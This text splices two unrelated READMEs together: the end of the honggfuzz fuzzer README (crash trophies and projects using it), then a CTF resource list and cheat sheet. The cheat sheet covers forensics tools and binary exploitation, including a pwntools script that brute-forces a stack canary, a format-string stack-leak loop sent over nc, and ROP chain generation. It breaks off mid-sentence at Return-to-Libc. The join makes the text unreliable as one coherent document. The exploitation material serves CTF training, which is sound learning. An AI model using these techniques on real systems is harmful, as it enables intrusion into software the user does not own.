__libvips__](https://github.com/libvips/libvips/issues/1890) * [Crash in __libocispec__)(https://github.com/containers/libocispec/commit/6079cd9490096cfb46752bd7491c71253418a02c) * __Rust__: * panic() in regex [#1](https://github.com/rust-lang/regex/issues/464), [#2](https://github.com/rust-lang/regex/issues/465), [#3](https://github.com/rust-lang/regex/issues/465#issuecomment-381412816) * panic() in h2 [#1](https://github.com/carllerche/h2/pull/260), [#2](https://github.com/carllerche/h2/pull/261), [#3](https://github.com/carllerche/h2/pull/262) * panic() in sleep-parser [#1](https://github.com/datrs/sleep-parser/issues/3) * panic() in lewton [#1](https://github.com/RustAudio/lewton/issues/27) * panic()/DoS in Ethereum-Parity [#1](https://srlabs.de/bites/ethereum_dos/) * crash() in Parts - a GPT partition manager [#1](https://github.com/DianaNites/parts/commit/d8ab05d48d87814f362e94f01c93d9eeb4f4abf4) * crashes in rust-bitcoin/rust-lightning [#1](https://github.com/rust-bitcoin/rust-lightning/commit/a9aa3c37fe182dd266e0faebc788e0c9ee724783) * ... and more ## Projects utilizing or inspired-by Honggfuzz * [__QuickFuzz__ by CIFASIS](http://quickfuzz.org) * [__OSS-Fuzz__](https://github.com/google/oss-fuzz) * [__Frog And Fuzz__](https://github.com/warsang/FrogAndFuzz/tree/develop) * [__interpreters fuzzing__: by dyjakan](https://github.com/dyjakan/interpreter-bugs) * [__riufuzz__: honggfuzz with AFL-like UI](https://github.com/riusksk/riufuzz) * [__h2fuzz__: fuzzing Apache's HTTP/2 implementation](https://github.com/icing/h2fuzz) * [__honggfuzz-dharma__: honggfuzz with dharma grammar fuzzer](https://github.com/Sbouber/honggfuzz-dharma) * [__Owl__: a system for finding concurrency attacks](https://github.com/hku-systems/owl) * [__honggfuzz-docker-apps__](https://github.com/skysider/honggfuzz_docker_apps) * [__FFW__: Fuzzing For Worms](https://github.com/dobin/ffw) * [__honggfuzz-rs__: fuzzing Rust with Honggfuzz](https://docs.rs/honggfuzz/) * [__roughenough-fuzz__](https://github.com/int08h/roughenough-fuzz) * [__Monkey__: a HTTP server](https://github.com/monkey/monkey/blob/master/FUZZ.md) * [__Killerbeez API__: a modular fuzzing framework](https://github.com/grimm-co/killerbeez) * [__FuzzM__: a gray box model-based fuzzing framework](https://github.com/collins-research/FuzzM) * [__FuzzOS__: by Mozilla Security](https://github.com/MozillaSecurity/fuzzos) * [__Android__: by OHA](https://android.googlesource.com/platform/external/honggfuzz) * [__QDBI__: by Quarkslab](https://project.inria.fr/FranceJapanICST/files/2019/04/19-Kyoto-Fuzzing_Binaries_using_Dynamic_Instrumentation.pdf) * [__fuzzer-test-suite__: by Google](https://github.com/google/fuzzer-test-suite) * [__DeepState__: by Trail-of-Bits](https://github.com/trailofbits/deepstate) * [__Quiche-HTTP/3__: by Cloudflare](https://github.com/cloudflare/quiche/pull/179) * [__Bolero__: fuzz and property testing framework](https://github.com/camshaft/bolero) * [__pwnmachine__: a vagrantfile for exploit development on Linux](https://github.com/kapaw/pwnmachine/commit/9cbfc6f1f9547ed2d2a5d296f6d6cd8fac0bb7e1) * [__Quick700__: analyzing effectiveness of fuzzers on web browsers and web servers](https://github.com/Quick700/Quick700) * [__python-hfuzz__: gluing honggfuzz and python3](https://github.com/thebabush/python-hfuzz) * [__go-hfuzz__: gluing honggfuzz and go](https://github.com/thebabush/go-hfuzz) * [__Magma__: a ground-truth fuzzing benchmark](https://github.com/HexHive/magma) * [__arbitrary-model-tests__: a procedural macro for testing stateful models](https://github.com/jakubadamw/arbitrary-model-tests) * [__Clusterfuzz__: the fuzzing engine behind OSS-fuzz/Chrome-fuzzing](https://github.com/google/clusterfuzz/issues/1128) * [__Apache HTTP Server__](https://github.com/apache/httpd/commit/d7328a07d7d293deb5ce62a60c2ce6029104ebad) * [__centos-fuzz__](https://github.com/truelq/centos-fuzz) * [__FLUFFI__: Fully Localized Utility For Fuzzing Instantaneously by Siemens](https://github.com/siemens/fluffi) * [__Fluent Bit__: a fast log processor and forwarder for Linux](https://github.com/fluent/fluent-bit/search?q=honggfuzz&unscoped_q=honggfuzz) * [__Samba__: a SMB server](https://github.com/samba-team/samba/blob/2a90202052558c945e02675d1331e65aeb15f9fa/lib/fuzzing/README.md) * [__universal-fuzzing-docker__: by nnamon](https://github.com/nnamon/universal-fuzzing-docker) * [__Canokey Core__: core implementations of an open-source secure key](https://github.com/canokeys/canokey-core/search?q=honggfuzz&unscoped_q=honggfuzz) * [__uberfuzz2__: a cooperative fuzzing framework](https://github.com/acidghost/uberfuzz2) * [__TiKV__: a distributed transactional key-value database](https://github.com/tikv/tikv/tree/99a922564face31bdb59b5b38962339f79e0015c/fuzz) * [__fuzz-monitor__](https://github.com/acidghost/fuzz-monitor/search?q=honggfuzz&unscoped_q=honggfuzz) * [__libmutator__: a C library intended to generate random test cases by mutating legitimate test cases](https://github.com/denandz/libmutator) * [__StatZone__: a DNS zone file analyzer](https://github.com/fcambus/statzone) * [__shub-fuzz/honggfuzz__: singularity image for honggfuzz](https://github.com/shub-fuzz/honggfuzz) * [__Code Intelligence__: fuzzing-as-a-service](https://www.code-intelligence.com/technology.html) * [__SpecFuzz__: fuzzing for Spectre vulnerabilities](https://github.com/OleksiiOleksenko/SpecFuzz) * [__rcc__: a Rust C compiler](https://github.com/jyn514/rcc#testing) * [__EIP1962Fuzzing__: Fuzzy testing of various EIP1962 implementations](https://github.com/matter-labs/eip1962_fuzzing) * [__wasm-fuzz__: Fuzzing of wasmer](https://github.com/wasmerio/wasm-fuzz/blob/master/honggfuzz.md), [blog post](https://medium.com/wasmer/fuzz-testing-in-webassembly-vms-3a301f982e5a) * [__propfuzz__: Rust tools to combine coverage-guided fuzzing with property-based testing - from Facebook](https://github.com/facebookincubator/propfuzz) * [__Bitcoin Core__: fuzzing](https://github.com/Nampu898/btc-2/blob/2af56d6d5c387c3208d3d5aae8d428a3d610446f/doc/fuzzing.md#fuzzing-bitcoin-core-using-honggfuzz) * [__ESP32-Fuzzing-Framework__: A Fuzzing Framework for ESP32 applications](https://github.com/MaxCamillo/esp32-fuzzing-framework/tree/5130a3c7bf9796fdeb44346eec3dcdc7e507a62b) * [__Fuzzbench__: Fuzzer Benchmarking As a Service](https://www.fuzzbench.com/) * [__rumpsyscallfuzz__: NetBSD Rump Kernel fuzzing](https://github.com/adityavardhanpadala/rumpsyscallfuzz) * [__libnbd__: fuzzing libnbd with honggfuzz](https://github.com/libguestfs/libnbd/commit/329c5235f81ab0d1849946bab5e5c4119b35e140) * [__EnsmallenGraph__: Rust library to run node2vec-like weighted random walks on very big graphs](https://github.com/LucaCappelletti94/ensmallen_graph/) * [__Oasis Core__](https://github.com/oasisprotocol/oasis-core/) * [__bp7-rs__: Rust implementation of dtn bundle protocol 7](https://github.com/dtn7/bp7-rs) * [__WHATWG__: URL C++ library](https://github.com/rmisev/url_whatwg/commit/0bb2821ccab170c7b12b45524a2196eb7bf35e0b) * [__Xaya Core / Chimera__: A decentralized open source information registration and transfer system](https://github.com/xaya/xaya/commit/b337bd7bc0873ace317ad8e1ebbd3842da3f81d5) * [__OpenWRT__: A Linux operating system targeting embedded devices](https://github.com/ynezz/openwrt-ci/commit/70956d056b1d041c28b76e9e06574d511b428f68) * [__RcppDeepStateTools__: A Linux-specific R package, with R functions for running the DeepState test harness](https://github.com/akhikolla/RcppDeepStateTools/commit/0b85b0b8b2ab357a0840f45957e2cb285d98d430) * [__Materialize__: A streaming database for real-time applications](https://github.com/MaterializeInc/materialize/pull/5519/commits/5eb09adb687c4980fc899582cefaa5e43d6e8ce7) * [__Rust-Bitcoin__](https://github.com/rust-bitcoin/rust-lightning/pull/782) * [__Substrate__: A next-generation framework for blockchain innovation](https://github.com/rakanalh/substrate/pull/5) * [__Solana__: A fast, secure, and censorship resistant blockchain](https://github.com/solana-labs/solana/issues/14707) * [__fwupd__: A project that aims to make updating firmware on Linux automatic, safe and reliable](https://github.com/fwupd/fwupd/pull/2666) * [__polkadot__: Implementation of a https://polkadot.network node in Rust based on the Substrate framework](https://github.com/paritytech/polkadot/pull/2021/commits/b731cfa34e330489ecd832b058e82ce2b88f75f5) * [__systemd__: is tested by honggfuzz](https://github.com/systemd/systemd/commit/d2c3f14fed67e7246adfdeeb5957c0d0497d7dc7) * [__freetype__: is tested by honggfuzz](https://github.com/freetype/freetype2-testing/commit/e401ce29d7bfe37cfd0085c244e213c913221b5f) * [__ghostscript__: is tested by honggfuzz](https://github.com/google/oss-fuzz/commit/365df31265438684a50c500e7d9355744fd7965d) * [__Fuzzme__: fuzzing templates for programming languages and fuzzers](https://github.com/ForAllSecure/fuzzme) * [__P0__: Fuzzing ImageIO](https://googleprojectzero.blogspot.com/2020/04/fuzzing-imageio.html) * [__TrapFuzz__: by P0](https://github.com/googleprojectzero/p0tools/tree/master/TrapFuzz) * [__Rust's fuzztest__](https://docs.rs/crate/fuzztest) * [_and multiple Rust projects_](https://github.com/search?q=%22extern+crate+honggfuzz%22&type=Code) ## Contact * User mailing list: [honggfuzz@googlegroups.com](mailto:honggfuzz@googlegroups.com), sign up with [this link](https://groups.google.com/forum/#!forum/honggfuzz). __This is NOT an official Google product__
# A Masters Guide to Learning Security Writeups / Files for some of the Cyber CTFs that I've done I've also included a list of **CTF resources** as well as a comprehensive **cheat sheet** covering tons of common CTF challenges # Table of Contents - **[Resources](#resources)** * [YouTube (We love video resources)](#youtube-we-love-video-resources) * [Practice / Learning Sites](#practice--learning-sites) + [CTFs](#ctfs) + [General](#general) + [Pwn](#pwn) + [Rev](#rev) + [Web](#web) + [Crypto](#crypto) + [Smart Contracts](#smart-contracts) + [Pentesting](#pentesting) - **[CTF Cheat Sheet](#ctf-cheat-sheet)** * [Forensics / Steganography](#forensics--steganography) - [General](#general) - [Audio](#audio) - [Image](#image) - [Video](#video) - [Machine Image](#machine-image) - [Pcap](#pcap) * [Pwn / Binary Exploitation](#pwn--binary-exploitation) - [General](#general-1) - [Buffer overflow](#buffer-overflow) - [PIE (Positional Independent Execution)](#pie-positional-independent-execution) - [NX (Non-executable)](#nx-non-executable) - [ROP (for statically compiled binaries)](#rop-for-statically-compiled-binaries) - [Stack Canary](#stack-canary) - [Format String Vulnerabilities](#format-string-vulnerabilities) - [Shellcode](#shellcode) - [Return-to-Libc](#return-to-libc) * [Reverse Engineering](#reverse-engineering) - [SMT Solvers](#smt-solvers) - [Reversing byte-by-byte checks](#reversing-byte-by-byte-checks-side-channel-attack) - [Searching strings with gef](#searching-strings-with-gef) * [Web](#web-1) - [Fuzzing input fields](#fuzzing-input-fields) * [Crypto](#crypto-1) + [CyberChef](#cyberchef) + [Common Ciphers](#common-ciphers) + [RSA](#rsa) - [Grab RSA Info with pycryptodome](#grab-rsa-info-with-pycryptodome) - [Chinese Remainder Theorem (p,q,e,c)](#chinese-remainder-theorem-pqec) - [Coppersmith attack (c,e)](#coppersmith-attack-ce) - [Pollards attack (n,e,c)](#pollards-attack-nec) - [Wiener Attack (n,e,c)](#wiener-attack-nec) + [Base16, 32, 36, 58, 64, 85, 91, 92](#base16-32-36-58-64-85-91-92) * [Box](#box) + [Connecting](#connecting) + [Enumeration](#enumeration) + [Privilege escalation](#privilege-escalation) + [Listen for reverse shell](#listen-for-reverse-shell) + [Reverse shell](#reverse-shell) + [Get interactive shell](#get-interactive-shell) - [Linux](#linux) - [Windows / General](#windows--general) * [OSINT](#osint) * [Misc](#misc) # Resources ## YouTube (We love video resources) - [John Hammond](https://www.youtube.com/user/RootOfTheNull) - Used to make a lot of CTF videos, but has moved on to more malware rev stuff - Still a ton of useful videos. The CTF ones especially are amazing for teaching brand new baby cyber members how to do things. Highly highly recommend. - [Live Overflow](https://www.youtube.com/channel/UClcE-kVhqyiHCcjYwcpfj9w) - Makes extremely interesting and in-depth videos about cyber. - Has an [amazing pwn series](https://www.youtube.com/watch?v=iyAyN3GFM7A&list=PLhixgUqwRTjxglIswKp9mpkfPNfHkzyeN&ab_channel=LiveOverflow) - [IppSec](https://www.youtube.com/channel/UCa6eh7gCkpPo5XXUDfygQQA) - Best pwner on YouTube. - Makes writeups of every single HackTheBox machine - Talks about diff ways to solve and why things work. Highly recommend - [Computerphile](https://www.youtube.com/user/Computerphile) - Same people as Numberphile, but cooler. Makes really beginner-level and intuitive videos about basic concepts. - [pwn.college](https://www.youtube.com/channel/UCkRe0pvrQvhkhFSciV0l2MQ) - Beautiful, amazing, wonderful ASU professor that has tons of videos on pwn - Guided course material: [https://pwn.college/](https://pwn.college/) - Tons of practice problems: [https://dojo.pwn.college/](https://dojo.pwn.college/) - [PwnFunction](https://www.youtube.com/channel/UCW6MNdOsqv2E9AjQkv9we7A) - Very high-quality and easy-to-understand animated videos about diff topics - Topics are a bit advanced, but easily understandable - [Martin Carlisle](https://www.youtube.com/user/carlislemc/featured) - Princeton Grad - Cyber Professor - picoCTF problem writer - YouTuber - He's got it all! - Fr makes amazing writeup videos about the picoCTF challenges. - [Sam Bowne](https://www.youtube.com/channel/UCC2OBhIt1sHE4odV05RYP1w) - Absolutely amazing professor at the City College of San Francisco - Sponsor of one of the best CPTC teams in the country - Open sources all of his lectures and course material on [his website](https://samsclass.info/) - [UFSIT](https://www.youtube.com/channel/UCkRe0pvrQvhkhFSciV0l2MQ) - UF Cyber team (I'm a bit biased, but def one of the better YouTube channels for this) - [Gynvael](https://www.youtube.com/channel/UCCkVMojdBWS-JtH7TliWkVg) - Polish guy that competes on an amazing international CTF team - Makes amazingly intuitive video writeups. Has done the entirety of picoCTF 2019 (that's a lot) - [Black Hills Information Security](https://www.youtube.com/@BlackHillsInformationSecurity) - Security firm that makes a ton of educational content - Always doing free [courses](https://www.antisyphontraining.com/pay-what-you-can/) and [webcasts](https://discord.gg/BHIS) about security topics - [stacksmashing](https://www.youtube.com/c/stacksmashing/videos) - Amazing reverse engineering & hardware hacking videos - Has a really cool series of him reverse engineering WannaCry - [Ben Greenberg](https://www.youtube.com/channel/UCsNzKjRToTA2G0lR8FiduWQ) - GMU prof with a bunch of pwn and malware video tutorials - A bit out-of-date, but still good - [InfoSecLab at Georgia Tech](https://www.youtube.com/channel/UCUcnLCrBVK9gS6ctEUVvkjA/featured) - Good & advanced in-depth lectures on pwn - Requires some background knowledge - [RPISEC](https://www.youtube.com/c/RPISEC_talks/videos) - RPI University team meetings - Very advanced and assumes a bit of cs background knowledge - [Matt Brown](https://www.youtube.com/@mattbrwn) - Embedded Security Pentester - Makes great beginner-friendly videos about IoT hacking **I've also made some playlists of diff topics** [Pwn](https://www.youtube.com/playlist?list=PLwP8RAsXLdE7rmCJsnhSigSdxsgIGFfvx) [Crypto](https://www.youtube.com/playlist?list=PLwP8RAsXLdE4luKhUCnMZbsWVB3nHtJgI) [Web](https://www.youtube.com/playlist?list=PLwP8RAsXLdE4tKItjvHIAyDxrVB9v20qP) [Forensics](https://www.youtube.com/playlist?list=PLwP8RAsXLdE77qStEZ6si0S8q1D8pdmmp) [OSINT](https://www.youtube.com/playlist?list=PLwP8RAsXLdE485giESRsEkAxnhMm8T3wo) [x86 Assembly](https://www.youtube.com/playlist?list=PLmxT2pVYo5LB5EzTPZGfFN0c2GDiSXgQe) [CSAW writeups](https://www.youtube.com/playlist?list=PLwP8RAsXLdE5H265XMi4q_LhskD1zJGgK) **Here are some slides I've made with the help of tjcsc** [Pwn](https://docs.google.com/presentation/d/1pusn6q46emvX9CN0SQ6YLctO2xVR8_DHEAg50tJbkYc/edit#slide=id.g17686fdf7bd_0_295) [Crypto](https://docs.google.com/presentation/d/1EmvJPyqm8bpNGwn0SGYgN1rKov-89PajtwE_uZaLESY/edit#slide=id.g12e7ff9f522_0_198) [Web](https://docs.google.com/presentation/d/1znRapkr1VAUO7gYjuB8jnFsBNSo0Jo7jsGE-JH7nZ9w/edit#slide=id.g1670189b8d9_0_303) [Rev](https://docs.google.com/presentation/d/1tcYyUrDrRkK74lQI0weHbjp2nSQtsRQlOGYz57zWjI8/edit#slide=id.g15f164357e9_0_4) ## Practice / Learning Sites ### CTFs - [PicoCTF](https://play.picoctf.org/practice) - Tons of amazing practice challenges. - Definitely the gold standard for getting started - [UCF](https://ctf.hackucf.org/challenges) - Good overall, but great pwn practice - I'm currently working on putting writeups [here](https://github.com/Adamkadaban/CTFs/tree/master/1.CTFs/HackUCF) - [hacker101](https://ctf.hacker101.com/ctf) - CTF, but slightly more geared toward pentesting - [CSAW](https://365.csaw.io/) - Down 90% the time and usually none of the connections work - If it is up though, it has a lot of good introductory challenges - [CTF101](https://ctf101.org/) - One of the best intros to CTFs I've seen (gj osiris) - Very succinct and beginner-friendly ### General - [HackTheBox](hackthebox.com) - The OG box site - Boxes are curated to ensure quality - Now has some CTF-style problems - Now has courses to start learning - [TryHackMe](https://tryhackme.com/hacktivities) - Slightly easier boxes than HackTheBox - Step-by-step challenges - Now has "learning paths" to guide you through topics - [CybersecLabs](https://www.cyberseclabs.co.uk/) - Great collection of boxes - Has some CTF stuff - [VulnHub](https://www.vulnhub.com/) - Has vulnerable virtual machines you have to deploy yourself - Lots of variety, but hard to find good ones imo ### Pwn - [pwnable.kr](http://pwnable.kr/index.php) - Challenges with good range of difficulty - [pwnable.tw](https://pwnable.tw/challenge/) - Harder than pwnable.kr - Has writeups once you solve the chall - [pwnable.xyz](https://pwnable.xyz/challenges/) - More pwn challenges - Has writeups once you solve the chall - You can upload your own challenges once you solve all of them - [pwn dojo](https://dojo.pwn.college) - Best collection of pwn challenges in my opinion - Backed up with slides teaching how to do it & has a discord if you need help - [nightmare](https://guyinatuxedo.github.io/) - Gold standard for pwning C binaries - Has a few mistakes/typos, but amazing overall - [pwn notes](https://ir0nstone.gitbook.io/notes/types/stack/ret2dlresolve) - Notes from some random person online - Very surface-level, but good intro to everything - [Security Summer School](https://security.cs.pub.ro/summer-school/wiki/start) - University of Bucharest Security Course - Very beginner-friendly explanations - [RPISEC MBE](https://github.com/RPISEC/MBE) - RPI's Modern Binary Exploitation Course - Has a good amount of labs/projects for practice & some (slightly dated) lectures - [how2heap](https://github.com/shellphish/how2heap) - Heap Exploitation series made by ASU's CTF team - Includes a very cool debugger feature to show how the exploits work - [ROPEmporium](https://ropemporium.com/) - Set of challenges in every major architecture teaching Return-Oriented-Programming - Very high quality. Teaches the most basic to the most advanced techniques. - I'm currently adding my own writeups [here](https://github.com/Adamkadaban/CTFs/tree/master/2.Labs/ROPEmporium/) - [Phoenix Exploit Education](https://exploit.education/phoenix/) - Tons of binary exploitation problems ordered by difficulty - Includes source and comes with a VM that has all of the binaries. ### Rev - [challenges.re](https://challenges.re/) - So many challenges 0_0 - Tons of diversity - [reversing.kr](http://reversing.kr/) - [crackmes.one](https://crackmes.one) - Tons of crackme (CTF) style challenges ### Web - [websec.fr](http://websec.fr/#) - Lots of web challenges with a good range of difficulty - [webhacking.kr](https://webhacking.kr/chall.php) - Has archive of lots of good web challenges - [Securing Web Applications](https://samsclass.info/129S/129S_S22.shtml) - Open source CCSF Course - [OWASP Juice Shop](https://owasp.org/www-project-juice-shop/) - Very much geared toward pentesting, but useful for exploring web in CTFs - Over 100 vulns/challenges in total - [PortSwigger](https://portswigger.net/web-security/dashboard) - Gold standard for understanding web hacking - Tons of amazing challenges & explanations - [DVWA](https://dvwa.co.uk/) - Very much geared toward pentesting, but useful for exploring web in CTFs - [bWAPP](http://www.itsecgames.com/) - Very much geared toward pentesting, but useful for exploring web in CTFs - [CTF Challenge](https://ctfchallenge.com/register) - Collection of web challenges made by Adam Langley that are made to be as realistic as possible. - Good for getting bug bounty experience ### Crypto - [CryptoHack](https://cryptohack.org/) - I'm currently working on putting writeups [here](https://github.com/Adamkadaban/CTFs/tree/master/2.Labs/CryptoHack) - [cryptopals](https://cryptopals.com/) - The OG crypto challenge site. ### Smart Contracts - [Capture the Ether](https://cryptohack.org/) ### Pentesting - [hacker101](https://www.hacker101.com/videos) - [hacksplaining](https://www.hacksplaining.com/lessons) - [Exploit developement](https://samsclass.info/127/127_S22.shtml) - Open source CCSF Course - [Intro to Security](https://cseweb.ucsd.edu/~dstefan/cse127-fall21/) - UC San Diego course taught by Deian Stefan - Covers basic pwn and crypto - [Active Directory Cheat Sheet](https://github.com/Tib3rius/Active-Directory-Exploitation-Cheat-Sheet) - [WADComs](https://wadcoms.github.io/) - Interactive cheat sheet for Windows/AD environments - [LOLBAS](https://lolbas-project.github.io/) - Interactive cheat sheet for **Windows** "Living off the land" binaries, scripts, and libraries for exploitation - [GTFOBins](https://gtfobins.github.io/) - Interactive cheat sheet for **Linux** "Living off the land" techniques. # CTF Cheat Sheet ## Forensics / Steganography #### General - Really good resource from John Hammond for different types of challenges: - [https://github.com/JohnHammond/ctf-katana](https://github.com/JohnHammond/ctf-katana) - Another very great cheat sheet for creating and solving challenges: - [https://github.com/apsdehal/awesome-ctf/blob/master/README.md](https://github.com/apsdehal/awesome-ctf/blob/master/README.md) - file - `file <file.xyz>` - Determines the type of file - steghide - `steghide extract -sf <file.xyz>` - Extracts embedded files - [stegseek](https://github.com/RickdeJager/stegseek) - `stegseek <file> <password list>` - Extracts embedded files using a wordlist - super super quick - binwalk - `binwalk -M --dd=".*" <file.xyz>` - Extracts embedded files - exiftool - `exiftool <file.xyz>` - Reads metadata - strings - `strings <file.xyz>` - Finds all printable characters in a file - hexedit - `hexedit <file.xyz>` - You may have to change the file signature on some images for them to open - [List of common file signatures](https://en.wikipedia.org/wiki/List_of_file_signatures) - Ghex (another hex editor but with GUI. Good if you need to jump to a certain byte) - `ghex <file.xyz>` - docx files are containers so you can unzip them to find hidden content - `unzip <file.docx>` - Grep | A good way to use grep to find the flag recursively: - `grep -r --text 'picoCTF{.*}'` - `egrep -r --text 'picoCTF{.*?}` - You can change 'picoCTF' to the beginning of the flag you are looking for - Ltrace | Allows you to see what the code is doing as you run the program: - `ltrace ./<file>` - `ltrace -s 100 ./<file>` - Ltrace shortens very long strings. You can use -s to increase how many characters ltrace shows. Good for when looking at strcmp that have large strings. #### Audio - Fax machine audio: - [Example](https://devcraft.io/2018/04/08/sunshine-ctf-2018.html) - [Decoder](http://www.dxsoft.com/en/products/seatty/) - SSTV (slow-scan tv) audio (moon stuff) - [Example](https://ctftime.org/writeup/25606) - [Decoder](https://ourcodeworld.com/articles/read/956/how-to-convert-decode-a-slow-scan-television-transmissions-sstv-audio-file-to-images-using-qsstv-in-ubuntu-18-04) - [Alt Decoder](https://www.blackcatsystems.com/software/sstv.html) - Use these qsstv settings: ![SSTV settings](.resources/SSTV_settings.png) - Spectrogram image - [Decoder](https://academo.org/demos/spectrum-analyzer/) - Change pitch, speed, direction... - [Pitch, speed, tune](https://29a.ch/timestretch/) - [Reverse](https://audiotrimmer.com/online-mp3-reverser/) - DTMF (dual tone multiple frequency) phone keys - `multimon-ng -a DTMF -t wav <file.wav>` - Keep in mind that these could me multitap letters. - [This](https://www.dcode.fr/multitap-abc-cipher) can decode the numbers into text - Cassette tape - [Example](https://ctftime.org/writeup/25597) - [Decoder](https://github.com/lunderhage/c64tapedecode) (wav to **tap** files) - Morse code - [Decoder](https://morsecode.world/international/decoder/audio-decoder-adaptive.html) #### Image - [stegsolve](https://stegonline.georgeom.net/upload) - Switch through bits - [foremost](https://github.com/korczis/foremost) - Special tool for extracting images - Can be used to put together broken images (in pcap for example) - [Depix](https://github.com/beurtschipper/Depix) - Unpixelate text - Check if something was photoshopped (look at highlights) - [https://29a.ch/photo-forensics/#error-level-analysis](https://29a.ch/photo-forensics/#error-level-analysis) - [zsteg](https://github.com/zed-0xff/zsteg) - LSB decoder - [jsteg](https://github.com/lukechampine/jsteg) - jpeg steganography solver - [pixrecovery](https://online.officerecovery.com/pixrecovery/) - so far the most effective png recovery tool i've found (as long as you don't care about watermarks) - [photopea](https://www.photopea.com/) also works very well - [crc32fix](https://github.com/Aloxaf/crc32fix) - fix height and width of png based on checksum - [PCRT](https://github.com/sherlly/PCRT) - fix png header and footer info - [png-crc-fix](https://github.com/landaire/png-crc-fix) - fix png checksum - pngcheck - find out if there are errors in the png - pngcheck <file> #### Video #### Machine Image - Recovering files - `photorec <file.bin>` - You can mount an image as a virtual machine - [https://habr.com/en/post/444940/](https://habr.com/en/post/444940/) - Mount a `.img` file: - `binwalk -M --dd=".*" <fileName>` - run `file` on output and select the Linux filesystem file - `losetup /dev/loop<freeLoopNumber> <fileSystemFile>` #### Pcap - Extract data with tcpflow - `tcpflow -r <file.pcap>` - Extract data with wireshark - File → Export Objects → Make selection ## Pwn / Binary Exploitation - **For this one, I suggest looking at my [LearnPwn](https://github.com/Adamkadaban/LearnPwn) repo instead, as this cheatsheet was made before I knew much about pwn** - However, I have included _some_ notes amending to what I have here. #### General - check security of ELF - `checksec <binary>` - `rabin2 -I <binary>` - check security of PE - [binary-security-check](https://github.com/koutheir/binary-security-check) - `binary-security-check <bin>.exe` - check seccomp bpf - [seccomp-tools](https://github.com/david942j/seccomp-tools) - `seccomp-tools dump ./<binary>` - look at symbols - `readelf -s <binary>` - look at strings - `rabin2 -z <binary>` - pack address to byte - little endian (for 32 bits) - `python -c "import pwn; print(pwn.p32(<intAddr>))` - big endian (for 64 bits) - `python -c "import pwn; print(pwn.p64(<intAddr>))` - pwntools automatically packs addresses with the correct endianness for you #### Buffer overflow - If you ever need to get a /bin/sh shell and you are sure it works but the program exits anyways, use this trick: - `( python -c "print '<PAYLOAD>'" ; cat ) | ./<program>` - pwntools does this with its `process.interactive()` #### PIE (Positional Independent Execution) - determine random value - `pwn cyclic <numChars>` to generate payload - `dmesg | tail | grep segfault` to see where error was - `pwn cyclic -l 0x<errorLocation>` to see random offset to control instruction pointer - [example](https://www.youtube.com/watch?v=WNh3tFysYXY&ab_channel=JohnHammond) #### NX (Non-executable) - We can use ROP (return oriented programming) to solve #### ROP (for statically compiled binaries) - ROPGadget - view gadgets & automatically generate ropchains - `ROPgadget --ropchain --binary <binary>` - You can then add padding at the start of the code (based on the difference between your buffer and return address) and run the code to get a shell - [Demo](https://www.youtube.com/watch?v=MSy0rdi1vbo&ab_channel=BenGreenberg) - ropr #### Stack Canary **Finding the stack canary in a debugger** - Stack canary is a value placed before the EIP/RIP (instruction pointer) that can overwritten by a buffer overflow. The program causes an error basically if the stack is overwritten to something different than it originally was. Our goal is to find the original stack so when we overflow, the program runs normally. - The stack canary is taken from `gs`, or `fs` (for 32 and 64 bit respectively) - In the disassembly, before something is read, you can see a line similar to the following: ``` 0x000000000000121a <+4>: sub rsp,0x30 0x000000000000121e <+8>: mov rax,QWORD PTR fs:0x28 0x0000000000001227 <+17>:mov QWORD PTR [rbp-0x8],rax 0x000000000000122b <+21>:xor eax,eax ``` - Here, the stack canary is moved into `rax` at offset +8. - Thus, break at the next offset and check what's in rax (`i r rax`) to see what the current canary is **Static Canaries** - A canary is only static if it was manually implemented by the programmer (which is the case in some intro pwn challenges), or if you are able to fork the program. - When you fork the binary, the forked one has the same canary, so you can do a byte-by-byte bruteforce on that **Extra** - When a stack canary is improperly overwritten, it will cause a call to `__stack_chk_fail` - If we can't leak the canary, we can also modify the GOT table to prevent it from being called - The canary is stored in the `TLS` structure of the current stack and is initialized by `security_init` - If you can overwrite the real canary value, you can set it equal whatever you decide to overflow. - Simple script to bruteforce a static 4 byte canary: ```python #!/bin/python3 from pwn import * #This program is the buffer_overflow_3 in picoCTF 2018 elf = ELF('./vuln') # Note that it's probably better to use the chr() function too to get special characters and other symbols and letters. # But this canary was pretty simple :) alphabet = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ1234567890" canary = '' # Here we are bruteforcing a canary 4 bytes long for i in range(1,5): for letter in range(0,len(alphabet)): # We will go through each letter/number in the string 'alphabet' p = elf.process() # We start the process wait = p.recv().decode('utf-8') p.sendline(str(32+i)) # In this program, we had to specify how many bytes we were gonna send. wait = p.recv().decode('utf-8') p.sendline('A'*32 + canary + alphabet[letter]) # We send the 32 A's to overflow, and then the canary we already have + our guess prompt = p.recv().decode('utf-8') if "Stack" not in prompt: # The program prints "Stack smashed [...]" if we get wrongfully write the canary. canary += alphabet[letter] # If it doesn't print that, we got part of our canary :) break # Move on to the next canary letter/number print("The canary is: " + canary) ``` #### Format String Vulnerabilities - Look at Table 2 for what to try if you see "printf(buf)" or something like that: - [https://owasp.org/www-community/attacks/Format_string_attack](https://owasp.org/www-community/attacks/Format_string_attack) - Highly recommend looking at John Hammond doing 'echooo' challenge from picoCTF 2018 - Sometimes, trying to print only strings from the stack like this: '%s %s %s %s %s %s' may cause errors since not everything in the stack is a string. - Try to minimize that by doing '%x %x %x %x %x %s' instead - Instead of having to constantly increase how many %x and %s you type, you can pass a parameter to make it easier: - `%1$s` | This will print the first value in the stack (from what I understand, the one right next to your buffer) as a string. - `%2$s` | This will print the 2nd value as a string, and you get the idea - You can use one-liner loops to try to find the flag by leaking the stack. Press ^C (CTRL + C) to go to the next value. - `for i in {1..100}; do echo "%$i\$s" | nc [b7dca240cf1fbf61.247ctf.com](http://b7dca240cf1fbf61.247ctf.com/) 50478; done` - You can control how much you leak using different size parameters: - `%hhx` leaks 1 byte (half of half of int size) - `%hx` leaks 2 bytes (half of int size) - `%x` leaks 4 bytes (int size) - `%lx` leaks 8 bytes (long size) - very good video on modifying the stack with fstring vuln and %n: - [https://www.youtube.com/watch?v=gzLPVkZbaPA&ab_channel=MartinCarlisle](https://www.youtube.com/watch?v=gzLPVkZbaPA&ab_channel=MartinCarlisle) #### Shellcode - Good website to find different shellcode: - [http://shell-storm.org/shellcode/](http://shell-storm.org/shellcode/) #### Return-to-Libc - We will overwrite the EIP to call the system() library function and we will also pass what it should execute, in this example a buffer with "/bin/sh" - Good explanation: - 